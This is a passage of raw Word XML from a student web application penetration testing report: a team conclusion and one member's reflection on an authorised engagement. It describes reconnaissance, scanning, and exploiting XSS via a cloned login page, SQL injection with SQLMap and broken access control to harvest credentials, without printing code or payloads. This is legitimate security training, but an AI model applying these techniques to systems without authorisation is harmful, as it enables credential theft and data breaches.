        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="00114C44">
        <w:t>allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the team to be fully aware of how, where, and why an exploit can or cannot work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C03504" w14:textId="0659F2AF" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t>When the team was pen-testing the web application, there were multiple challenges encountered. These challenges included the very tedious manual vulnerability testing task as there were many different pages and authorization levels to consider between the employer and employee accounts</w:t>
      </w:r>
      <w:r w:rsidR="00E05B70">
        <w:t xml:space="preserve"> as well as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identifying point</w:t>
      </w:r>
      <w:r w:rsidR="00114C44">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of entr</w:t>
      </w:r>
      <w:r w:rsidR="00114C44">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> amongst the features and functions such as the candidate role within the web application which was not completed.</w:t>
      </w:r>
      <w:r w:rsidR="00AA0744">
        <w:t xml:space="preserve"> Hence, an </w:t>
      </w:r>
      <w:r w:rsidR="00F44007">
        <w:t>initial challenge</w:t>
      </w:r>
      <w:r w:rsidR="00AA0744">
        <w:t xml:space="preserve"> was finding vulnerabilities as </w:t>
      </w:r>
      <w:r w:rsidR="00581449">
        <w:t xml:space="preserve">there were limited entry points </w:t>
      </w:r>
      <w:r w:rsidR="00E17508">
        <w:t>within the web application to perform attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00A748C2">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="008801EE">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>ne vulnerability and exploit that stood out the most was finding an injection point to conduct SQL Injection. There were limited inputs available within the web application itself and the features w</w:t>
      </w:r>
      <w:r w:rsidR="00114C44">
        <w:t>ere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> easily overlooked when checking for vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEDFE7" w14:textId="22738F27" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">The team was resilient in finding other vulnerabilities which might exist, looking at each page of the web application extra carefully, testing each input point, and looking at the </w:t>
      </w:r>
      <w:r w:rsidR="002A4DC5">
        <w:t>source code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the page to find any vulnerabilities that could be exploited. </w:t>
      </w:r>
      <w:r w:rsidR="001B54B8">
        <w:t>More vulnerabilities were discovered by the team</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which made the whole mind-numbing process worthwhile.</w:t>
      </w:r>
      <w:r w:rsidR="00E029C6">
        <w:t xml:space="preserve"> The whole </w:t>
      </w:r>
      <w:r w:rsidR="001D3CFE">
        <w:t>proces</w:t>
      </w:r>
      <w:r w:rsidR="001B54B8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001D3CFE">
        <w:t xml:space="preserve"> of finding the vulnerabilities w</w:t>
      </w:r>
      <w:r w:rsidR="001B54B8">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="001D3CFE">
        <w:t xml:space="preserve"> continuous as </w:t>
      </w:r>
      <w:r w:rsidR="00344549">
        <w:t xml:space="preserve">the team </w:t>
      </w:r>
      <w:r w:rsidR="008811A5">
        <w:t>learned</w:t>
      </w:r>
      <w:r w:rsidR="00344549">
        <w:t xml:space="preserve"> more about the different </w:t>
      </w:r>
      <w:r w:rsidR="006E6FB7">
        <w:t xml:space="preserve">OWASP Top 10 – 2017 vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="004332E6">
        <w:t>over</w:t>
      </w:r>
      <w:r w:rsidR="000C149E">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="004332E6">
        <w:t>weeks</w:t>
      </w:r>
      <w:r w:rsidR="00F50D4E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t>improved</w:t>
      </w:r>
      <w:r w:rsidR="00F50D4E">
        <w:t xml:space="preserve"> each other’s knowledge and skills</w:t>
      </w:r>
      <w:r w:rsidR="006E6FB7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66940320" w14:textId="7DE4CFF5" w:rsidR="006C06D1" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">Throughout this assignment, the team had the opportunity to enforce the value </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Resilience, one of the values prized by Ngee Ann Polytechnic in the form R3ICG as well as knowledge </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t>learned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in WAPT. </w:t>
      </w:r>
      <w:r w:rsidR="006C06D1">
        <w:t xml:space="preserve">Apart from Resilience, cooperation and teamwork amongst the team members bolstered by chemistry, allowed this assignment to proceed smoothly, such as handling, assisting, and transferring the different tasks assigned and collating all the information gathered from each individual </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="006C06D1">
        <w:t xml:space="preserve"> contribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045562C3" w14:textId="78FEDE4E" w:rsidR="0006719E" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">Having hands-on experience on how pen-testing </w:t>
      </w:r>
      <w:r w:rsidR="009F7CFC">
        <w:t>a web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in real-life</w:t>
      </w:r>
      <w:r w:rsidR="009F7CFC">
        <w:t xml:space="preserve"> was liked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> made this assignment interesting and unique in comparison to previous assignments</w:t>
      </w:r>
      <w:r w:rsidR="004332E6">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:t>projects previously embarked</w:t>
      </w:r>
      <w:r w:rsidR="00CD7686">
        <w:t xml:space="preserve"> which are </w:t>
      </w:r>
      <w:r w:rsidR="00C04FC2">
        <w:t xml:space="preserve">only on </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0037798E">
        <w:t>school level</w:t>
      </w:r>
      <w:r w:rsidR="002F2CB0">
        <w:t xml:space="preserve"> without </w:t>
      </w:r>
      <w:r w:rsidR="007478E1">
        <w:t>industrial involvement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The experience </w:t>
      </w:r>
      <w:r w:rsidR="00FD0641">
        <w:t>helped</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> widened the team’s view of the Cybersecurity Industry as well as the paperwork that </w:t>
      </w:r>
      <w:r w:rsidR="3EE426D8">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB725D">
        <w:t xml:space="preserve">required </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">during the Pre- and Post- Testing Phase. </w:t>
      </w:r>
      <w:r w:rsidR="00026C54">
        <w:t xml:space="preserve">The team </w:t>
      </w:r>
      <w:r w:rsidR="000512AD">
        <w:t>learned</w:t>
      </w:r>
      <w:r w:rsidR="00026C54">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="007478E1">
        <w:t xml:space="preserve">be more resourceful </w:t>
      </w:r>
      <w:r w:rsidR="007504E8">
        <w:t>to not only</w:t>
      </w:r>
      <w:r w:rsidR="00026C54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00450597">
        <w:t xml:space="preserve">explore and </w:t>
      </w:r>
      <w:r w:rsidR="00026C54">
        <w:t xml:space="preserve">utilize the different tools available </w:t>
      </w:r>
      <w:r w:rsidR="00450597">
        <w:t xml:space="preserve">online </w:t>
      </w:r>
      <w:r w:rsidR="007504E8">
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidR="00412D52">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="007504E8">
        <w:t>construct our own</w:t>
      </w:r>
      <w:r w:rsidR="00450597">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA5A94">
        <w:t>tools</w:t>
      </w:r>
      <w:r w:rsidR="00450597">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E520F">
        <w:t>which suit</w:t>
      </w:r>
      <w:r w:rsidR="00015D94">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="002E520F">
        <w:t xml:space="preserve"> the requirements of the </w:t>
      </w:r>
      <w:r w:rsidR="006652C3">
        <w:t>assignment</w:t>
      </w:r>
      <w:r w:rsidR="0062269B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A0C90">
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidR="00026C54">
        <w:t xml:space="preserve"> pen-testing a web application</w:t>
      </w:r>
      <w:r w:rsidR="00C32C65">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B15C91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE799E">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="008C0E18">
        <w:t>was beyond this curriculum</w:t>
      </w:r>
      <w:r w:rsidR="002C63C7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0006719E">
        <w:t>The team also gain</w:t>
      </w:r>
      <w:r w:rsidR="007F2AAC">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="0006719E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0029744F">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="0006719E">
        <w:t xml:space="preserve">valuable knowledge </w:t>
      </w:r>
      <w:r w:rsidR="009A3701">
        <w:t xml:space="preserve">on real-life </w:t>
      </w:r>
      <w:r w:rsidR="005B1F96">
        <w:t>exploitations</w:t>
      </w:r>
      <w:r w:rsidR="00680A80">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00680A80">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the vulnerabilities, </w:t>
      </w:r>
      <w:r w:rsidR="00DE1E9F">
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="00680A80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F2AAC">
        <w:t xml:space="preserve">how the vulnerabilities could have affected the </w:t>
      </w:r>
      <w:r w:rsidR="00DE1E9F">
        <w:t xml:space="preserve">confidentiality, integrity, and availability of </w:t>
      </w:r>
      <w:r w:rsidR="00EF18C2">
        <w:t xml:space="preserve">data within </w:t>
      </w:r>
      <w:r w:rsidR="00DE1E9F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007F2AAC">
        <w:t>web application if an attacker w</w:t>
      </w:r>
      <w:r w:rsidR="00DE1E9F">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="007F2AAC">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="005B1F96">
        <w:t xml:space="preserve">discover and </w:t>
      </w:r>
      <w:r w:rsidR="007F2AAC">
        <w:t>exploit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746C8E6" w14:textId="0006496F" w:rsidR="00B970DD" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">The outcome of this assignment was </w:t>
      </w:r>
      <w:r w:rsidR="00594106">
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rewarding and fulfilling. The experience and values gained from this Web Application Pen-Testing Project will help the team improve</w:t>
      </w:r>
      <w:r w:rsidR="00196896">
        <w:t xml:space="preserve"> overall</w:t>
      </w:r>
      <w:r w:rsidR="009577E0">
        <w:t xml:space="preserve"> and be prepared for the industry</w:t>
      </w:r>
      <w:r w:rsidR="00485C4D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B970DD">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AF551" w14:textId="4A8C68D9" w:rsidR="00B970DD" w:rsidRDefault="0014095E" w:rsidP="0014095E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc93487318"/>
      <w:bookmarkStart w:id="176" w:name="_Toc93502897"/>
      <w:bookmarkStart w:id="177" w:name="_Toc93526933"/>
      <w:bookmarkStart w:id="178" w:name="_Toc94100264"/>
      <w:r w:rsidRPr="626F33D1">
        <w:lastRenderedPageBreak/>
        <w:t>Individual Reflection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="14B2DF87" w14:textId="77777777" w:rsidR="00C47DDA" w:rsidRDefault="00C47DDA" w:rsidP="00C47DDA"/>
    <w:p w14:paraId="08E1341B" w14:textId="777BA8C0" w:rsidR="00C47DDA" w:rsidRDefault="00990674" w:rsidP="00C47DDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc93487319"/>
      <w:bookmarkStart w:id="180" w:name="_Toc93502898"/>
      <w:bookmarkStart w:id="181" w:name="_Toc93526934"/>
      <w:bookmarkStart w:id="182" w:name="_Toc94100265"/>
      <w:r>
        <w:t xml:space="preserve">Kok Jia Cheng, </w:t>
      </w:r>
      <w:r w:rsidR="00F62406">
        <w:t>Glenn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="2C7D2788" w14:textId="0E80045E" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">Upon completion of this penetration testing assignment, I felt that I have definitely gained a lot of new knowledge and hands-on </w:t>
      </w:r>
      <w:r w:rsidR="0028205F">
        <w:t>experience</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Through this project, I was able to apply what I have </w:t>
      </w:r>
      <w:r w:rsidR="004E3AB9">
        <w:t>learned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in school to a production web application as well as learning new skills as the journey progresses. Initially</w:t>
      </w:r>
      <w:r w:rsidR="004E3AB9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the start of the project, I was excited for it to begin and proposed to my team to start on the pre-testing phase as soon as possible. This includes preparation of the documents such as the Scope and Rules of Engagement. The first step I did was to contact the client, Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin, through email and introduced the team along with a rough timeline and testing plan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862481F" w14:textId="6A732938" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">At first, I was quite nervous </w:t>
      </w:r>
      <w:r w:rsidR="004E3AB9">
        <w:t xml:space="preserve">about </w:t>
      </w:r>
      <w:r>
        <w:t>contacting Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin as I have never done anything like this before and it feels quite intimidating to contact someone outside of the school. But </w:t>
      </w:r>
      <w:r w:rsidR="004E3AB9">
        <w:t>over time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after talking to the client, I felt more comfortable communicating with </w:t>
      </w:r>
      <w:r w:rsidR="00D42B78">
        <w:t>him</w:t>
      </w:r>
      <w:r>
        <w:t>, and we also moved our communication means to WhatsApp where we discussed further on our plans and emailing him the documents. I felt relieved and grateful that Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin was very understanding the friendly towards my team and I as I was worried that he might have unreasonable demands that my team cannot handle. But fortunately, he was quite informal with us and was easy to work with, he was also active in replying to our messages and emails promptly which allowed us to work fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75C48C" w14:textId="3B9AD693" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>When creating the documents, I felt that there was a learning curve that was not very straight</w:t>
      </w:r>
      <w:r w:rsidR="00BF7046">
        <w:t xml:space="preserve"> forward</w:t>
      </w:r>
      <w:r>
        <w:t>. Initially, the team and I had a slight difficulty in differentiating between scope and rules of engagement. But I drafted the documents while referring to the PowerPoint slides for definition and based on the samples given to us. While I was drafting the document, my team was also giving suggestions on what can be added to fit the client’s needs. But I was cautious in stating our terms as I did not want to promise something I might not be able to deliver. Once our documents were vetted by Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tan Hock Guan, lecturer</w:t>
      </w:r>
      <w:r w:rsidR="00A640AD">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>in-charge, I did some minor adjustments that were pointed out and submitted to the client. Thankfully it did not take long for Mr</w:t>
      </w:r>
      <w:r w:rsidR="00851D51">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin’s response which made me </w:t>
      </w:r>
      <w:r w:rsidR="00851D51">
        <w:t>feel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an accomplishment as this was the first step in the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A020F4B" w14:textId="62C44B0C" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>Since getting the login credentials from Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin, I started looking into the web application and looking for possible vulnerabilities through analyzing the features and source codes of the pages. At first, it looks as though it had multiple possible entry points but after checking the features, it </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>appears that the way the web application was implemented made the vulnerability not present. For example, initially</w:t>
      </w:r>
      <w:r w:rsidR="00851D51">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it looks as though the search bar was vulnerable to injection attacks but after checking the source code, it was actually a filter that </w:t>
      </w:r>
      <w:r w:rsidR="00A102D3">
        <w:t>interact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the front end instead of the database. Hence, I was very worried that I would not be able to find any vulnerabilities at that point in time due to my lack of knowledge and experience. Nonetheless, I tried not to feel demoralized and proceed with the testing phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C118151" w14:textId="49699DC8" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>Through information gathering, I found out that Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin is a full stack developer at Tri-Niche along with other information that may be useful regarding the web application. For this process, I first conducted passive reconnaissance to gather as much information as I can about the web application’s domain by using DNSRecon to discover information about the domain, and SubBrute to discover subdomains. By doing so, I thought that I was able to find a weakness in the web application through the subdomains </w:t>
      </w:r>
      <w:r w:rsidR="00FE7155">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> finding possible services the server may be running to discover vulnerabilities. From that, I managed to find out there it was using cPanel and webmail but at that point, I was unsure of what possible exploits I can perform and just document my findings at that moment. From analyzing Tri-Niche’s website, I noticed that the owner’s information as well the company information can be seen. I felt that this may be revealing too much information for attackers as it may lead to possible targeted attacks such as spear phishing. </w:t>
      </w:r>
      <w:r w:rsidR="00A102D3">
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the end, I compiled all my findings through passive reconnaissance and documented </w:t>
      </w:r>
      <w:r w:rsidR="00A102D3">
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the reports. I also cross-referenced my findings with my teammates to verify and identify possible weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AEECC" w14:textId="7B3ED562" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>Moving on, I conducted active reconnaissance using several scanning tools and some of which were not used in the curriculum. In this stage, I was trying my hardest to profile the web application and identify the technologies it used. With the help of automated scanning tools, I managed to find out that it is using CodeIgniter PHP framework and some JavaScript libraries such as jQuery through the use of Netcraft. However, I felt that there was not enough information gathered and searched for other possible tools to retrieve more intelligence. I discovered a website called CodeinWP that can be used to discover information about the server such as the hostname and the hosting service</w:t>
      </w:r>
      <w:r w:rsidR="00B35B1F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006955C8">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it uses Web-Hosting.com. From searching online, I also found out about a tool </w:t>
      </w:r>
      <w:r w:rsidR="005F3B90">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was useful in my information gathering. This tool called Wafw00f revealed that the web application was protected by a Web Application Firewall (WAF) by LiteSpeed Technologies, this however made me more anxious knowing it has security measures in-place and exploiting the web application may be more difficult </w:t>
      </w:r>
      <w:r w:rsidR="005F3B90">
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I thought. From these findings I had discovered, I compiled and documented them as well as </w:t>
      </w:r>
      <w:r w:rsidR="005F3B90">
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the web architecture diagram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7D104" w14:textId="53917C83" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next, I needed to find out more information about the web application to identify possible entry points for an attack. I used OWASP ZAP to conduct Spidering and </w:t>
      </w:r>
      <w:r w:rsidR="00145899">
        <w:t>discover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hyperlinks in the web application that can be easily missed when inspecting the source code</w:t>
      </w:r>
      <w:r w:rsidR="000467FA">
        <w:t>. I</w:t>
      </w:r>
      <w:r>
        <w:t>t also helps to identify possible misconfigurations within the web application. However, after observing the scan results, I was very puzzled as the output did not reflect the pages seen on the browser</w:t>
      </w:r>
      <w:r w:rsidR="00145899">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and many expected results are not shown. After much thought and based on my knowledge, I suspected that it was because ZAP did not have a session token while performing the scan and that is why any pages beyond the login page </w:t>
      </w:r>
      <w:r w:rsidR="00145899">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not shown. Searching for a solution was not easy as there was no specific documentation on Spidering with a Cookie. Eventually, I came across a short YouTube video demonstrating the steps I needed to take to get the results I want, and I was relieved that the scan was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA562D" w14:textId="5602898A" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>After completing the scans, I noticed that the session on ZAP can be saved but upon loading the saved session, it took a very long time to load and still did not manage to restore the session. I was troubled as I need</w:t>
      </w:r>
      <w:r w:rsidR="005434B2">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the results to analyze the site tree on ZAP and referring to the exported list of URLs was not intuitive or effective. With that in mind, I had an idea to create a tool </w:t>
      </w:r>
      <w:r w:rsidR="00145899">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my team and I can use to visualize the site tree based on the exported results from ZAP. The tool was called TreeViewGenerator and it takes a list of URLs, converts it to a JSON format by organizing it based on subdirectories and files, and generates an interactive user interface where the directories can be shown or hidden for ease of visualization. However, I did not code everything from scratch as it can take probably a whole day to complete it, and because of that, I resulted in using some libraries created by different developers and modifying </w:t>
      </w:r>
      <w:r w:rsidR="00145899">
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to fit my needs.  I was quite proud of this tool as it allowed me to identify possible attacks within the web application such as Broken Access Control, and it also helped my teammate in creating the sitemap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB8E061" w14:textId="2C97C350" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">Once the information gathering phase was completed, I moved on to vulnerability scanning to detect for weaknesses and possible exploits. The tool I chose to use was SkipFish and OWASP ZAP as I felt quite confident in using these tools. The scan from SkipFish took quite a long time but after the scan was complete, I was excited to view the results. At first, I was surprised to see a Shell Injection vector in the result but after reviewing the response and payload, it was actually a false positive alert. The other vulnerabilities detected were also not very critical such as directory listing and server error. Still, I used the active scan from ZAP to try and identify more vulnerabilities that may not be discovered by SkipFish. But to my disappointment, the results were similar, and the vulnerabilities discovered were not very severe </w:t>
      </w:r>
      <w:r w:rsidR="0034362C">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can lead to a huge exploit. Following </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>that, I tried to discover for Cross-Site Scripting (XSS) attacks using ZAP fuzzing feature as well as XSSSniper. But both results discovered nothing and the fuzzer was blocked by the WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884AF85" w14:textId="70D33B6D" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">After compiling my findings from the automated vulnerability scanners, I moved on and attempted manual testing for a more in-depth analysis. For testing of XSS, it was not easy as almost all the input fields were validated, and I was searching high and low for a possible entry point. But I was astonished when I discovered that there was one field not checked. This managed to raise my hopes up a little to discover more vulnerabilities. After analyzing the structure of the web application, I was looking for a page where it was obvious that retrieval of information from the database was done to perform an injection attack. I managed to find the page I was looking for and at first, the entry point was not obvious as I had to inject it into the URL. With that, I discovered SQL injection as well. Next, for discovering broken access control, I researched on what this vulnerability was and what possible weaknesses were there. After testing, I noticed several issues with this specific vulnerability. Through all that, I was extremely proud and relieved that I was able to apply my knowledge </w:t>
      </w:r>
      <w:r w:rsidR="00597CA6">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> discovering these vulnerabilities that automated scanners could not detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E69B2" w14:textId="7AC5019A" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t>The next step was to create the Proof-of-Concept use cases and get approval from Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin for the team and I to exploit our discovered vulnerabilities. Thankfully, Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin was swift in responding to my email and I was extremely excited to perform the exploits. For this project, I decided to create some of my own exploits instead of using known tools. For exploiting XSS, I could have used BeEF but instead, I constructed somewhat of a replica of the login page and hosted </w:t>
      </w:r>
      <w:r w:rsidR="00597CA6">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on my </w:t>
      </w:r>
      <w:r w:rsidR="00597CA6">
        <w:t>webserver</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It was quite enjoyable as I had to research, learn, and think of solutions where I can make this exploit possible. In exploiting broken access control, there were several things I could have done but I found that the most severe would be to delete and disclose information. Using my knowledge of Python programming, I created a script to enumerate and exploit this weakness which led me to collect multiple credentials from a non-privileged user. Moreover, performing injection using SQLMap revealed all the credentials and data in the database. For using SQLMap, it was unsuccessful at the start as I noticed that an injection point had to be included </w:t>
      </w:r>
      <w:r w:rsidR="00A02B02">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the command when running the tool which was something I discovered to be useful knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C39862F" w14:textId="1A9E0E63" w:rsidR="00471D00" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">Looking back on the start of the assignment, I felt that I had gained more knowledge of what Web Application Penetration Testing is and the importance of testing web applications before production as well as after. Throughout this project, it has been an endless learning experience for me, which should also be the case. Moreover, </w:t>
      </w:r>
      <w:r w:rsidR="00282A4A">
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had also helped in strengthening my </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
